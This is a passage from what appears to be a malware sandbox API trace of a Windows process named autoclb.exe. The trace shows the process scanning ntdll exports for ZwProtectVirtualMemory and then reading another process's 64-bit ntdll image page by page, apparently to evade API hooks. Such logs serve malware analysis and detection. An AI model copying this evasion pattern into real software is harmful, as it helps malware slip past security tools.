(lpString1="NtAllocateLocallyUniqueId", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAllocateReserveObject", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAllocateUserPhysicalPages", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAllocateUuids", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAllocateVirtualMemory", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAlpcAcceptConnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAlpcCancelMessage", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAlpcConnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAlpcConnectPortEx", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAlpcCreatePort", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAlpcCreatePortSection", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAlpcCreateResourceReserve", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAlpcCreateSectionView", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAlpcCreateSecurityContext", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAlpcDeletePortSection", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAlpcDeleteResourceReserve", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAlpcDeleteSectionView", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAlpcDeleteSecurityContext", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAlpcDisconnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAlpcImpersonateClientContainerOfPort", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAlpcImpersonateClientOfPort", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAlpcOpenSenderProcess", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAlpcOpenSenderThread", lpString2="ZwProtectVirtualMemory") returned -1 [0076.819] lstrcmpA (lpString1="NtAlpcQueryInformation", lpString2="ZwProtectVirtualMemory") returned -1 [0076.819] lstrcmpA (lpString1="NtAlpcQueryInformationMessage", lpString2="ZwProtectVirtualMemory") returned -1 [0076.819] lstrcmpA (lpString1="NtAlpcRevokeSecurityContext", lpString2="ZwProtectVirtualMemory") returned -1 [0076.819] lstrcmpA (lpString1="NtAlpcSendWaitReceivePort", lpString2="ZwProtectVirtualMemory") returned -1 [0076.819] lstrcmpA (lpString1="NtAlpcSetInformation", lpString2="ZwProtectVirtualMemory") returned -1 [0076.819] lstrcmpA (lpString1="NtApphelpCacheControl", lpString2="ZwProtectVirtualMemory") returned -1 [0076.819] lstrcmpA (lpString1="NtAreMappedFilesTheSame", lpString2="ZwProtectVirtualMemory") returned -1 [0076.819] lstrcmpA (lpString1="NtAssignProcessToJobObject", lpString2="ZwProtectVirtualMemory") returned -1 [0076.819] lstrcmpA (lpString1="NtAssociateWaitCompletionPacket", lpString2="ZwProtectVirtualMemory") returned -1 [0076.819] lstrcmpA (lpString1="NtCallbackReturn", lpString2="ZwProtectVirtualMemory") returned -1 [0076.819] lstrcmpA (lpString1="NtCancelIoFile", lpString2="ZwProtectVirtualMemory") returned -1 [0076.819] lstrcmpA (lpString1="NtCancelIoFileEx", lpString2="ZwProtectVirtualMemory") returned -1 [0076.819] lstrcmpA (lpString1="NtCancelSynchronousIoFile", lpString2="ZwProtectVirtualMemory") returned -1 [0076.819] lstrcmpA (lpString1="NtCancelTimer", lpString2="ZwProtectVirtualMemory") returned -1 [0076.819] lstrcmpA (lpString1="NtCancelTimer2", lpString2="ZwProtectVirtualMemory") returned -1 [0076.819] lstrcmpA (lpString1="NtCancelWaitCompletionPacket", lpString2="ZwProtectVirtualMemory") returned -1 [0076.819] lstrcmpA (lpString1="NtClearEvent", lpString2="ZwProtectVirtualMemory") returned -1 [0076.819] lstrcmpA (lpString1="NtClose", lpString2="ZwProtectVirtualMemory") returned -1 [0076.819] lstrcmpA (lpString1="NtCloseObjectAuditAlarm", lpString2="ZwProtectVirtualMemory") returned -1 [0076.819] lstrcmpA (lpString1="NtCommitComplete", lpString2="ZwProtectVirtualMemory") returned -1 [0076.819] lstrcmpA (lpString1="NtCommitEnlistment", lpString2="ZwProtectVirtualMemory") returned -1 [0076.819] lstrcmpA (lpString1="NtCommitTransaction", lpString2="ZwProtectVirtualMemory") returned -1 [0076.819] lstrcmpA (lpString1="NtCompactKeys", lpString2="ZwProtectVirtualMemory") returned -1 [0076.819] lstrcmpA (lpString1="NtCompareObjects", lpString2="ZwProtectVirtualMemory") returned -1 [0076.819] lstrcmpA (lpString1="NtCompareTokens", lpString2="ZwProtectVirtualMemory") returned -1 [0076.819] lstrcmpA (lpString1="NtCompleteConnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0076.819] lstrcmpA (lpString1="NtCompressKey", lpString2="ZwProtectVirtualMemory") returned -1 [0076.819] lstrcmpA (lpString1="NtConnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0076.820] VirtualFree (lpAddress=0x2580000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.829] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x77ca0000 [0076.829] GetProcAddress (hModule=0x77ca0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77d0a840 [0076.829] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x1e4, ProcessInformationClass=0x0, ProcessInformation64=0x5df414, ProcessInformationLength=0x30, ReturnLength=0x5df468 | out: ProcessInformation64=0x5df414, ReturnLength=0x5df468) returned 0x0 [0076.829] VirtualAlloc (lpAddress=0x0, dwSize=0x5a4, flAllocationType=0x3000, flProtect=0x4) returned 0x160000 [0076.830] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x77ca0000 [0076.830] GetProcAddress (hModule=0x77ca0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77d0a840 [0076.830] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x1e4, ProcessInformationClass=0x0, ProcessInformation64=0x5df414, ProcessInformationLength=0x30, ReturnLength=0x5df468 | out: ProcessInformation64=0x5df414, ReturnLength=0x5df468) returned 0x0 [0076.830] StrRChrA (lpStart="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe", lpEnd=0x0, wMatch=0x5c) returned="\\autoclb.exe" [0076.830] StrRChrA (lpStart="C:\\Windows\\SYSTEM32\\ntdll.dll", lpEnd=0x0, wMatch=0x5c) returned="\\ntdll.dll" [0076.830] StrRChrA (lpStart="C:\\Windows\\system32\\wow64.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64.dll" [0076.830] StrRChrA (lpStart="C:\\Windows\\system32\\wow64win.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64win.dll" [0076.830] StrRChrA (lpStart="C:\\Windows\\system32\\wow64cpu.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64cpu.dll" [0076.830] lstrcmpiA (lpString1="autoclb.exe", lpString2="NTDLL.DLL") returned -1 [0076.830] StrChrA (lpStart="autoclb.exe", wMatch=0x2e) returned=".exe" [0076.830] lstrcmpiA (lpString1="autoclb", lpString2="NTDLL.DLL") returned -1 [0076.830] lstrcmpiA (lpString1="ntdll.dll", lpString2="NTDLL.DLL") returned 0 [0076.830] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.830] VirtualAlloc (lpAddress=0x0, dwSize=0x1c2000, flAllocationType=0x3000, flProtect=0x4) returned 0x2580000 [0076.831] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee380000, Buffer=0x7ff8, BufferSize=0x2580000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.831] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee381000, Buffer=0x7ff8, BufferSize=0x2581000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.831] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee382000, Buffer=0x7ff8, BufferSize=0x2582000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.831] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee383000, Buffer=0x7ff8, BufferSize=0x2583000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.831] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee384000, Buffer=0x7ff8, BufferSize=0x2584000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.831] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee385000, Buffer=0x7ff8, BufferSize=0x2585000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.831] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee386000, Buffer=0x7ff8, BufferSize=0x2586000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.832] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee387000, Buffer=0x7ff8, BufferSize=0x2587000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.832] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee388000, Buffer=0x7ff8, BufferSize=0x2588000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.832] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee389000, Buffer=0x7ff8, BufferSize=0x2589000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.832] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee38a000, Buffer=0x7ff8, BufferSize=0x258a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.832] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee38b000, Buffer=0x7ff8, BufferSize=0x258b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.832] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee38c000, Buffer=0x7ff8, BufferSize=0x258c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.832] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee38d000, Buffer=0x7ff8, BufferSize=0x258d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.833] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee38e000, Buffer=0x7ff8, BufferSize=0x258e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.833] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee38f000, Buffer=0x7ff8, BufferSize=0x258f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.833] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee390000, Buffer=0x7ff8, BufferSize=0x2590000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.833] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee391000, Buffer=0x7ff8, BufferSize=0x2591000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.833] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee392000, Buffer=0x7ff8, BufferSize=0x2592000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.833] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee393000, Buffer=0x7ff8, BufferSize=0x2593000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.833] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee394000, Buffer=0x7ff8, BufferSize=0x2594000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.834] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee395000, Buffer=0x7ff8, BufferSize=0x2595000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.834] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee396000, Buffer=0x7ff8, BufferSize=0x2596000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.834] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee397000, Buffer=0x7ff8, BufferSize=0x2597000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.834] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee398000, Buffer=0x7ff8, BufferSize=0x2598000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.834] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee399000, Buffer=0x7ff8, BufferSize=0x2599000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.834] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee39a000, Buffer=0x7ff8, BufferSize=0x259a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.834] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee39b000, Buffer=0x7ff8, BufferSize=0x259b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.834] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee39c000, Buffer=0x7ff8, BufferSize=0x259c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.835] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee39d000, Buffer=0x7ff8, BufferSize=0x259d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.835] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee39e000, Buffer=0x7ff8, BufferSize=0x259e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.835] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee39f000, Buffer=0x7ff8, BufferSize=0x259f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.835] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a0000, Buffer=0x7ff8, BufferSize=0x25a0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.835] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a1000, Buffer=0x7ff8, BufferSize=0x25a1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.835] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a2000, Buffer=0x7ff8, BufferSize=0x25a2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.835] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a3000, Buffer=0x7ff8, BufferSize=0x25a3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.836] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a4000, Buffer=0x7ff8, BufferSize=0x25a4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.836] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a5000, Buffer=0x7ff8, BufferSize=0x25a5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.836] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a6000, Buffer=0x7ff8, BufferSize=0x25a6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.836] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a7000, Buffer=0x7ff8, BufferSize=0x25a7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.836] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a8000, Buffer=0x7ff8, BufferSize=0x25a8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.836] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3a9000, Buffer=0x7ff8, BufferSize=0x25a9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.836] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3aa000, Buffer=0x7ff8, BufferSize=0x25aa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.837] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ab000, Buffer=0x7ff8, BufferSize=0x25ab000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.837] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ac000, Buffer=0x7ff8, BufferSize=0x25ac000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.837] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ad000, Buffer=0x7ff8, BufferSize=0x25ad000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.837] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ae000, Buffer=0x7ff8, BufferSize=0x25ae000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.837] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3af000, Buffer=0x7ff8, BufferSize=0x25af000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.837] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b0000, Buffer=0x7ff8, BufferSize=0x25b0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.837] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b1000, Buffer=0x7ff8, BufferSize=0x25b1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.837] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b2000, Buffer=0x7ff8, BufferSize=0x25b2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.838] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b3000, Buffer=0x7ff8, BufferSize=0x25b3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.838] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b4000, Buffer=0x7ff8, BufferSize=0x25b4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.838] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b5000, Buffer=0x7ff8, BufferSize=0x25b5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.838] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b6000, Buffer=0x7ff8, BufferSize=0x25b6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.838] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b7000, Buffer=0x7ff8, BufferSize=0x25b7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.838] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b8000, Buffer=0x7ff8, BufferSize=0x25b8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.838] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3b9000, Buffer=0x7ff8, BufferSize=0x25b9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.839] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ba000, Buffer=0x7ff8, BufferSize=0x25ba000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.839] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3bb000, Buffer=0x7ff8, BufferSize=0x25bb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.839] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3bc000, Buffer=0x7ff8, BufferSize=0x25bc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.839] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3bd000, Buffer=0x7ff8, BufferSize=0x25bd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.840] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3be000, Buffer=0x7ff8, BufferSize=0x25be000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.840] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3bf000, Buffer=0x7ff8, BufferSize=0x25bf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.840] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c0000, Buffer=0x7ff8, BufferSize=0x25c0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.840] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c1000, Buffer=0x7ff8, BufferSize=0x25c1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.840] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c2000, Buffer=0x7ff8, BufferSize=0x25c2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.840] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c3000, Buffer=0x7ff8, BufferSize=0x25c3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.840] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c4000, Buffer=0x7ff8, BufferSize=0x25c4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.840] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c5000, Buffer=0x7ff8, BufferSize=0x25c5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.841] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c6000, Buffer=0x7ff8, BufferSize=0x25c6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.841] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c7000, Buffer=0x7ff8, BufferSize=0x25c7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.841] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c8000, Buffer=0x7ff8, BufferSize=0x25c8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.841] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3c9000, Buffer=0x7ff8, BufferSize=0x25c9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.841] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ca000, Buffer=0x7ff8, BufferSize=0x25ca000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.841] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3cb000, Buffer=0x7ff8, BufferSize=0x25cb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.841] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3cc000, Buffer=0x7ff8, BufferSize=0x25cc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.842] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3cd000, Buffer=0x7ff8, BufferSize=0x25cd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.842] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3ce000, Buffer=0x7ff8, BufferSize=0x25ce000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.842] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3cf000, Buffer=0x7ff8, BufferSize=0x25cf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.842] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d0000, Buffer=0x7ff8, BufferSize=0x25d0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.842] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee3d1000, Buffer=0x7ff8, BufferSize=0x25d1000, NumberOfBytesRead=0x1000 | out: 